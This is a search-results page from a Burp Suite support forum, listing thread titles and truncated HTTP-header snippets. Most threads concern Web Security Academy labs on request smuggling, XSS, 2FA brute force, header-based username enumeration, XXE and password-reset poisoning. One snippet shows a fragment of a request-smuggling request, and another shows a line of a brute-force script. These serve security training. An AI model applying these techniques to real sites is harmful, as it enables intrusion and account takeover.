Disable content type changes

further investigation it appears to be a result of Burp rewriting the content type from 'application/x-www-form-urlencoded

Last updated: Nov 23, 2018 08:42AM UTC | 2 Agent replies | 1 Community replies | How do I?

lab question

<form id="my_form" action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">

Last updated: Nov 12, 2019 01:05PM UTC | 5 Agent replies | 5 Community replies | How do I?

Valid XSS not reporting in issues ? Is it me?

max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://testphp.vulnweb.com Content-Type: application/x-www-form-urlencoded

Last updated: Aug 23, 2021 02:25PM UTC | 2 Agent replies | 3 Community replies | Bug Reports

HTTPRQ Lab - Exploiting HTTP request smuggling to deliver reflected XSS

HTTP/1.1 Host: ac231f491feb99a4807c00a50038000f.web-security-academy.net Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: ac231f491feb99a4807c00a50038000f.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Sep 05, 2021 01:14AM UTC | 1 Agent replies | 3 Community replies | Bug Reports

Excel Macro & Burp

compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded

Last updated: May 29, 2024 07:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to perform web cache deception (Solution incorrect)

POST / HTTP/1.1 Host: xxx-your-lab-id-xxx.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Jun 25, 2021 07:17AM UTC | 4 Agent replies | 7 Community replies | How do I?

Burpsuite error or using incorrectily

0 Upgrade-Insecure-Requests: 1 Origin: https://www.kkkkkkkk.com Content-Type: application/x-www-form-urlencoded

Last updated: Jun 17, 2021 03:42PM UTC | 3 Agent replies | 3 Community replies | How do I?

Username enumeration via response timing problems with X-Forwarded-For header

Upgrade-Insecure-Requests: 1 Origin: https://asdsdasdasd.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Nov 09, 2023 12:57PM UTC | 1 Agent replies | 1 Community replies | How do I?

XSS False positive

fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded

Last updated: Nov 09, 2016 09:32AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Unable to build http request with header

103.0.5060.134 Safari/537.36, Connection: close, Cache-Control: max-age=0, Content-Type: application/x-www-form-urlencoded

Last updated: May 09, 2023 10:43AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

No Host header in https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass

u=1 te: trailers content-type: application/x-www-form-urlencoded

Last updated: Jul 08, 2024 02:17PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

SSO with microsoftonline.com

sXXX0T-HXXXxb-FXXXH_cfXXX6-KHXXXX81&cbcxt=&username=USER%40ENTERPRISE_OFFICE_DOMAIN.com&mkt=&lc= with a www-form-urlencoded ENTERPRISE_OFFICE_DOMAIN.com mkt lc This is followed by a POST to ttps://login.microsoftonline.com/login.srf with www-form-urlencoded

Last updated: Jun 11, 2019 02:26PM UTC | 1 Agent replies | 1 Community replies | How do I?

HTTP Request Smuggling POST Request with Body

a GET request: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: May 29, 2020 08:12AM UTC | 1 Agent replies | 0 Community replies | How do I?

Allowing the symbol "&" to be part of a string, instead of being something else

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 08, 2021 06:26PM UTC | 2 Agent replies | 9 Community replies | How do I?

Hey, I'm having an error when launching payload

id=wiener Content-Type: application/x-www-form-urlencoded Content-Length: 117 Connection: close Cookie

Last updated: Apr 23, 2020 02:12AM UTC | 1 Agent replies | 6 Community replies | How do I?

Lab: 2FA bypass using a brute-force attack doesn't get me a 302

Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Jul 05, 2022 07:53AM UTC | 1 Agent replies | 0 Community replies | How do I?

Missed SQL Injection

=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Nov 23, 2021 08:40AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Adding X-Forwarded-For to bypass IP based brute force protection

https://acaf1f021f283a268092b4c2004c008d.web-security-academy.net/login Content-Type: application/x-www-form-urlencoded

q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Mar 15, 2024 07:50AM UTC | 7 Agent replies | 7 Community replies | How do I?

Audit Item Status shows " Error Request time out and Unknown Errors "

like Gecko) Chrome/84.0.4147.125 Safari/537.36 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded

Last updated: Sep 02, 2020 12:29PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

BurpSuite Proxy Listener, Mac OS and Chrome not playing nice together

BurpSuite by attacking a local instance of WebGoat (intentionally-vulnerable web app at https://owasp.org/www-project-webgoat

Last updated: Sep 05, 2023 09:14AM UTC | 2 Agent replies | 1 Community replies | How do I?

Authentication Multi factor lab - 2FA Broken Login

q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Jul 19, 2022 05:32PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Burp Extension CSRF Token

cookie values are set here Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Jan 13, 2017 08:47PM UTC | 0 Agent replies | 2 Community replies | How do I?

Same site, two different authentication methods (Basic first, then NTLM)

connect to the site, you're redirected to the BIG-IP's proxied.site.com/my.policy page, which wants Basic WWW

Last updated: May 09, 2016 07:43AM UTC | 1 Agent replies | 0 Community replies | How do I?

Intruder only works after repeater...sort of

Upgrade-Insecure-Requests: 1 Origin: https://um-auth-qa.auth.eu-west-1.amazoncognito.com Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2020 09:28AM UTC | 1 Agent replies | 2 Community replies | How do I?

Username enumeration via response timing: not getting response using repeater with X-Forwarded-For

Origin: https://ace11f691fef2ad580c703dd004a00c5.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Aug 09, 2021 10:41AM UTC | 1 Agent replies | 0 Community replies | How do I?

Password Reset Poisoning via Dangling Markeup

Origin: https://0a3100a703b733a780cdd52400fa00cc.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Aug 28, 2023 10:56AM UTC | 7 Agent replies | 7 Community replies | Bug Reports

Add a processing rule

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36 Content-Type: application/x-www-form-urlencoded

Last updated: Nov 13, 2023 10:46AM UTC | 1 Agent replies | 0 Community replies | How do I?

Mystery lab challenges that require to submit solution seem to be broken

HTTP/1.1 Host: {BURP_LAB}.web-security-academy.net Content-Length: 39 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 21, 2022 01:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Different results Automated Scan vs Manual Active Scan

q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Jun 13, 2022 09:26AM UTC | 1 Agent replies | 0 Community replies | How do I?

Problem with "Lab: HTTP request smuggling, basic CL.TE vulnerability"

oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg== Content-Type: application/x-www-form-urlencoded oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg== Content-Type: application/x-www-form-urlencoded oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg== Content-Type: application/x-www-form-urlencoded

Last updated: Aug 20, 2021 12:00PM UTC | 2 Agent replies | 2 Community replies | Burp Extensions

Handling multipart requests with Montoya API

request that looks like this: POST /something HTTP/1.1 Host: whatever Content-type: application/x-www-form-urlencoded

Last updated: Sep 08, 2023 04:08PM UTC | 2 Agent replies | 1 Community replies | Burp Extensions

Auditing not calling doActiveScan(...) method via Extensibility API

q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8000/ Content-Type: application/x-www-form-urlencoded

Last updated: Mar 15, 2019 03:28PM UTC | 4 Agent replies | 4 Community replies | Burp Extensions

Browser receives "HTTP/1.0 200 Connection established" from BURP which received "HTTP/1.1 404 Not Found"

Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: May 12, 2020 08:30AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Locked due to many failed login attempts as soon as i scan my application

=0 Origin: https://test2.tstraining.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Jan 25, 2018 10:59AM UTC | 1 Agent replies | 0 Community replies | How do I?

how to add X-Forwarded-For and what is columns in Lab Username enumeration via response timing

X-Forwarded-For: 203.0.113.8 <---- INSERT HERE AND REMOVE THIS COMMENT Content-Type: application/x-www-form-urlencoded

Last updated: Oct 30, 2023 08:22PM UTC | 6 Agent replies | 7 Community replies | How do I?

Is it possible to send request from a password reset post to forward to a different email

Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: https://example.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 12, 2022 06:35PM UTC | 0 Agent replies | 0 Community replies | Feature Requests

Error In php Code

Signature does not match session in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Signature does not match session in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Last updated: Jul 16, 2020 08:34AM UTC | 3 Agent replies | 4 Community replies | How do I?

Burp Scanner does not recognize Open Redirect

DEADBEEF6B690E7B865A46CDDEADBEEF.aa_bbb_1_cc_0 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Sep 09, 2016 12:03PM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Decoding Gzip/Deflate issues

packet: OST /tracker-api/tracker/trackerLog HTTP/1.1 Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: Nov 20, 2017 10:47AM UTC | 1 Agent replies | 0 Community replies | How do I?

Academy : Is there a Newbie "Academy 101" How to document / URL

Create a VM, Install ABC on it, point off to www.

Last updated: Jun 14, 2024 12:11PM UTC | 2 Agent replies | 1 Community replies | How do I?

Paused-Based Desync Detection reporting HTTP/2 requests

Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Length: 332 Content-Type: application/x-www-form-urlencoded

Last updated: Jan 08, 2024 02:58PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: 2FA bypass using a brute-force attack

q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

+ '/login' urlForTokenPage = url + '/login2' headerObj = { "Content-Type": "application/x-www-form-urlencoded

Last updated: Jan 19, 2022 10:53PM UTC | 7 Agent replies | 16 Community replies | How do I?

Lab: Exploiting XXE using external entities to retrieve files

13 Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: May 16, 2021 12:08PM UTC | 1 Agent replies | 5 Community replies | How do I?

How can I send request from a password reset post to forward to a different email

Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: https://example.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 13, 2022 11:16AM UTC | 0 Agent replies | 0 Community replies | How do I?

Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Origin: https://0a49005803315b4185f35e92000600e2.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Dec 28, 2023 07:59AM UTC | 2 Agent replies | 2 Community replies | How do I?

Unable to filter X-Forwarded-Host with Param Miner Burpsuite Professional v2024.5.5, Lab: Password reset poisoning via middleware

Origin: https://0a39009804c89ab28091da0d004800b9.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Jul 11, 2024 11:43PM UTC | 3 Agent replies | 5 Community replies | Burp Extensions

macOSX V11.2 Big Sur, OWASP BWA and Virtual box--Home Hacking CyberSec Lab

r140961 (Qt5.6.3) OWASP BWA = Latest available from Sourceforge, links are in the book and a quick WWW

Last updated: Feb 09, 2021 09:01PM UTC | 0 Agent replies | 0 Community replies | How do I?

Host header not present - Password reset poisoning via middleware

Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Mar 29, 2022 07:57AM UTC | 2 Agent replies | 1 Community replies | How do I?

Turbo Intruder error

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Jun 21, 2023 06:54AM UTC | 5 Agent replies | 7 Community replies | Burp Extensions

Exploiting PHP deserialization with a pre-built gadget chain payload

Signature does not match session in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Last updated: Jul 16, 2020 07:54AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Version 2023.9.1 and 2023.10.2 does not include <vulnerabilityClassifications> in the xml and html reports generated using sparky

v --location 'http://<burp_vm IP>:<SparkyPort>/sparky/report' --header 'Content-Type: application/x-www-form-urlencoded

Last updated: Sep 27, 2023 10:48AM UTC | 4 Agent replies | 2 Community replies | How do I?

Lab CORS vulnerability with trusted null origin: CORS missing allow origin

}, { "name": "Content-Type", "value": "application/x-www-form-urlencoded [], "headersSize": 746, "postData": { "mimeType": "application/x-www-form-urlencoded

Last updated: Feb 14, 2023 11:56AM UTC | 2 Agent replies | 2 Community replies | How do I?

Lab: Username enumeration via response timing - ("X-Forwarded-For:" not working)

Origin: https://ac921f4f1ec67a2fc05d23890023008c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Nov 29, 2021 12:00PM UTC | 3 Agent replies | 3 Community replies | How do I?

Active Scan insertion point types & other bugs

Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT content-type: application/x-www-form-urlencoded

Last updated: Jul 13, 2020 07:13AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

HTTP Request Smuggler: Error in thread: Can't find the header: Connection. See error pane for stack trace.

Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded